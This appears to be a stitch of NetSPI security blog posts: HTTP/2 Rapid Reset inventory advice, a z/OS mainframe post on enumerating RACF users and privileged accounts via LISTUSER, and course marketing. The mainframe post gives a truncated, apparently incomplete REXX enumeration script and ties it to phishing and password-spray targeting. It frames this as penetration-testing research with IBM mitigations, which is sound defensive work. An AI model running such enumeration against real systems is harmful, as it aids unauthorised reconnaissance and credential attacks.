“It seems to me like the bigger challenge in this particular scenario is that organizations struggle to have an up-to-date asset inventory. Not only having an up-to-date asset inventory, but truly understanding what software components, what versions of packages, what type of bill of materials they have in those assets.” 

This is where technology like Attack Surface Management is extremely helpful because it provides continuous asset discovery and monitoring. 

The first step to take when addressing HTTP/2 Rapid Reset is to perform internal checks for HTTP/2 and all potentially vulnerable hosts or verify with your web server vendors. Patches and updates for common web servers and programming languages are available to apply now or will be coming soon.  

In the words of NetSPI’s Research Engineer Isaac Clayton,

“Patch early, patch often.”  

NetSPI’s Rapid Response to HTTP/2 Rapid Reset

For NetSPI’s ASM users, our team swiftly added capabilities to the platform to detect HTTP/2 and allow our clients to get a full inventory of all potentially vulnerable hosts.   

Once a zero-day vulnerability was discovered, our Attack Surface Management team responded quickly to create automation for NetSPI’s ASM platform. This automation allowed our clients to establish an accurate inventory of their assets using HTTP/2.0 and focus their efforts on mitigation and remediation.  

Our approach involved a fast response through active collaboration between our teams. We utilized our ASM operations team, a group of security professionals who proactively address vulnerabilities and verify risks for clients, as well as our software engineers and front-end developers.  

We moved incredibly quickly to implement the solution and make it available for NetSPI’s ASM clients. This rapid response demonstrates how beneficial it is to have a full team supporting our clients and the ASM technology that helps them maintain security. One listener on our LinkedIn Live commented, “Wow!!! That’s fast given today’s response climate. From Rapid Reset to Rapid Response!” (Kudos to the ASM operations team for their fast response!) 

Get a deeper look at CVE-2023-44487 – HTTP/2 Rapid Reset by watching our LinkedIn Live with NetSPI’s Field CISO Nabil Hannan and myself, Security Research Engineer Isaac Clayton. Learn more about our ASM solution including how to use it to run the check for HTTP/2 by contacting our team.


Enumerating Users on z/OS with LISTUSER

Mainframes are ever being included in Red Team Engagements to demonstrate impact. If an adversary can access your mainframe environment they could cause material damage to customer data, cause an outage or potentially steal money. However, when an adversary gets on a mainframe, the account they have may not provide enough access to do anything. NetSPI has performed multiple Mainframe Penetration Tests where the base account was locked down enough to prevent them from doing any real damage.

In a vacuum, that’s fine. But adversaries typically don’t operate in a vacuum and will leverage whatever access they have to further develop their target list. In this blog post we’ll outline the risks of allowing all users the ability to run the LISTUSER command against any user.

The LISTUSER command is a RACF command that you use in TSO that allows you to list information about accounts on the system. TSO is the terminal shell for mainframes, similar to something you’d find on a Linux server, but the prompt is “READY” instead of $. Issuing the LISTUSER command without any arguments outputs information about the currently logged in user.

If you have access to list other user information, you can issue the LISTUSER command with the argument for any user you want to see. For example running the “LISTUSER NETSPI” would output information about that specific user.

Allowing anyone to just list anyone else’s username and group membership is dangerous. In fact, once you’ve confirmed you can access other user profiles through the LISTUSER command you can issue the command LISTUSER * to list all users in RACF! From an adversarial perspective this makes enumerating users and conducted password sprays or targeted attacks very easy.

Although, that’s not 100% true. For a typical user, if you’re allowed to list other users it will return user information, but if the user profile you tried to list is an administrative user (i.e. that user has system SPECIAL in RACF) you get an error message that your access is denied. Once we know this, enumerating administrative accounts is trivial.

Typically, mainframe shops will have username conventions. For this example (and the sake of time) we’ll assume a z/OS userid starts with a letter followed by five numbers. With the ability to list user IDs we can use some REXX to identify every account on the system and all the privileged accounts:

/* REXX */ 
parse arg len 
SAY "LISTUSER RACF User Enumeration Tool" 
SAY "VER 1" 
/* License: GPLv3 */ 

NUM = '0123456789' 
DO I=1 to 26 
 DO J=1 to 10 
  S2 = RIGHT(LEFT(NUM,J),1) 
  DO K=1 to 10 
   S3 = RIGHT(LEFT(NUM,K),1) 
   DO L=1 to 10 
    S4 = RIGHT(LEFT(NUM,L),1) 
    DO M=1 to 10 
     S5 = RIGHT(LEFT(NUM,M),1) 
     DO N=1 to 10 
      S6 = RIGHT(LEFT(NUM,N),1) 
         L = OUTTRAP('LUO.') 
         LU S1||S2||S3||S4||S5||S6 
         L = OUTTRAP('OFF') 
         if POS('USER=',LUO.1) > 0 THEN DO 
          PARSE VAR LUO.1 USER . 
          PARSE VAR LUO.3 ATTR . 
          SAY USER ATTR 

After this script completes, I have a list of five users who are privileged accounts — now I know to target those users either in a phishing campaign or stealing their credentials using other means.

We know now that allowing access to LISTUSER is unsafe. Fortunately IBM explains how to limit who should be able to run the LISTUSER command in its z/OS Security Server RACF Security Administrator’s Guide. In summary, to prevent enumeration quickly you can limit access to the IRR.LISTUSER profile in the FACILITY class.

This, however, only prevents an attacker from listing user details. Due to a quirk in the way IBM implemented the LISTUSER command, we can still enumerate all the accounts on the system. If you enter the LISTUSER command and don’t have access to perform that function RACF returns an access denied error message. Conversely, if we enter a user that doesn’t exist, we get the message “that user doesn’t exist.”

Therefore, using the same REXX code as above, we can still enumerate every user on the system; we just can’t get details about that user. A few changes to the code left up to the reader would still allow you to enumerate all users. Additionally, for a sophisticated attacker it wouldn’t be hard to link mainframe IDs to domain user IDs and hone their target selection for either spear phishing or password spray attacks.

If you were hoping to be able to catch this type of attack in SMF, that is currently not possible. According to IBM, you cannot detect this type of attack even if you’ve sufficiently locked down who can issue the LISTUSER command. From IBM: “RACF does not log failed access attempts to IRR.LU resources. Successful accesses to IRR.LU resources are logged at the installation’s discretion.”

Despite these limitation NetSPI strongly recommends you limit who is able to run the LISTUSER command against other users, limiting the information available to attackers make it much harder to profile the system and other users. NetSPI offers multiple different types of Mainframe Penetration Tests to help you better understand the threats and mitigations to your enterprise mainframes, identifying the misconfiguration is just one item we look for when conducting penetration tests or red team activities.

Mainframe Penetration Testing 

Recent Posts


NetSPI’s Dark Side Ops Courses: Evolving Cybersecurity Excellence

Today, we are excited to introduce you to the transformed Dark Side Ops (DSO) training courses by NetSPI. With years of experience under our belt, we’ve taken our renowned DSO courses and reimagined them to offer a dynamic, self-directed approach. 

The Evolution of DSO

Traditionally, our DSO courses were conducted in-person, offering a blend of expert-led lectures and hands-on labs. However, the pandemic prompted us to adapt. We shifted to remote learning via Zoom, but we soon realized that we were missing the interactivity and personalized pace that made in-person training so impactful. 

A Fresh Approach

In response to this, we’ve reimagined DSO for the modern era. Presenting our self-directed, student-paced online courses that give you the reins to your learning journey. While preserving the exceptional content, we’ve infused a new approach that includes: 

  • Video Lectures: Engaging video presentations that bring the classroom to your screen, allowing you to learn at your convenience. 
  • Real-World Labs: Our DSO courses now enable you to create your own hands-on lab environment, bridging the gap between theory and practice. 
  • Extended Access: Say goodbye to rushed deadlines. You now have a 90-day window to complete the course at your own pace, ensuring a comfortable and comprehensive learning experience. 
  • Quality, Reimagined: We are unwavering in our commitment to upholding the highest training standards. Your DSO experience will continue to be exceptional. 
  • Save Big: For those eager to maximize their learning journey, register for all three courses and save $1,500. 

What is DSO?

DSO 1: Malware Dev Training

  • Dive deep into source code to gain a strong understanding of execution vectors, payload generation, automation, staging, command and control, and exfiltration. Intensive, hands-on labs provide even intermediate participants with a structured and challenging approach to write custom code and bypass the very latest in offensive countermeasures. 

DSO 2: Adversary Simulation Training

  • Do you want to be the best resource when the red team is out of options? Can you understand, research, build, and integrate advanced new techniques into existing toolkits? Challenge yourself to move beyond blog posts, how-tos, and simple payloads. Let’s start simulating real world threats with real world methodology. 

DSO Azure: Azure Cloud Pentesting Training 

  • Traditional penetration testing has focused on physical assets on internal and external networks. As more organizations begin to shift these assets up to cloud environments, penetration testing processes need to be updated to account for the complexities introduced by cloud infrastructure. 

Join us on this journey of continuous learning, where we’re committed to supporting you every step of the way. Register for Dark Side Ops today.

Join our mailing list for more updates and remember, in the realm of cybersecurity, constant evolution is key. We are here to help you stay ahead in this ever-evolving landscape. 

Discover how NetSPI ASM solution helps organizations identify, inventory, and reduce risk to both known and unknown assets.